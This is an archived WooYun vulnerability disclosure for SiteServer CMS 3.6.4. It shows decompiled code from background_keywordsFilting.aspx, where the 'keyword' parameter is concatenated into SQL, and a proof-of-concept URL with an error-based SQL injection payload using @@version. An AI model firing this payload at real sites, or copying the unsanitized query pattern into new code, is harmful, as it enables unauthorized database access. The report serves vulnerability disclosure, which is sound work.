乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-22: 细节已通知厂商并且等待厂商处理中 2013-11-25: 厂商已经确认,细节仅向厂商公开 2013-11-28: 细节向第三方安全合作伙伴开放 2014-01-19: 细节向核心白帽子及相关领域专家公开 2014-01-29: 细节向普通白帽子公开 2014-02-08: 细节向实习白帽子公开 2014-02-20: 细节向公众公开
siteserver 最新版3.6.4 存在注入, 第四个注入
第三个注入存在/siteserver/bbs/background_keywordsFilting.aspx用.NET Reflector 反编译SiteServer.BBS.dll这个文件查看代码如下:
this.spContents.ItemsPerPage = 20; this.spContents.ConnectionString = DataProvider.ConnectionString; this.spContents.SelectCommand = DataProvider.KeywordsFilterDAO.GetSelectCommend(ConvertHelper.GetInteger(base.Request.QueryString["grade"]), ConvertHelper.GetInteger(base.Request.QueryString["categoryid"]), ConvertHelper.GetString(base.Request.QueryString["keyword"])); this.spContents.SortField = "Taxis"; if ((((uint) num) | 15) == 0) { goto Label_00A0; } this.spContents.SortMode = SortMode.ASC; this.btnDelAll.Attributes.Add("onclick", "return checkstate('myform','删除');"); isPostBack = base.Request.QueryString["Delete"] == null; goto Label_00D8;
上面可以利用的参数: keyword
public string GetSelectCommend(int grade, int categoryid, string keyword){ string str; StringBuilder builder = new StringBuilder(); builder.Append("SELECT * FROM bbs_KeywordsFilter WHERE CategoryID !=0 "); bool flag = grade == 0; goto Label_00D6;Label_0095: flag = string.IsNullOrEmpty(keyword); if (!flag) { builder.Append(" AND Name like '%" + keyword + "%'"); if ((((uint) categoryid) | uint.MaxValue) != 0) { } } builder.Append(" ORDER BY Taxis DESC"); if ((((uint) categoryid) + ((uint) categoryid)) <= uint.MaxValue) { if (((uint) grade) <= uint.MaxValue) { return builder.ToString(); } goto Label_00D6; }Label_00AA: builder.Append(" AND CategoryID=" + categoryid); if (((uint) categoryid) <= uint.MaxValue) { goto Label_0095; } return str;Label_00D6: if (!flag) { builder.Append(" AND Grade=" + grade); } flag = categoryid == 0; if (flag) { goto Label_0095; } goto Label_00AA;}
很明显,可以导致注入
http://www.target.com/siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test'%20and%20@@version=1%20and%202='1
官网:官网的数据库异常,显示“对象名 'bbs_KeywordsFilter' 无效”,实际中可以利用
对keyword进行过滤
危害等级:中
漏洞Rank:6
确认时间:2013-11-25 09:28
感谢提醒
暂无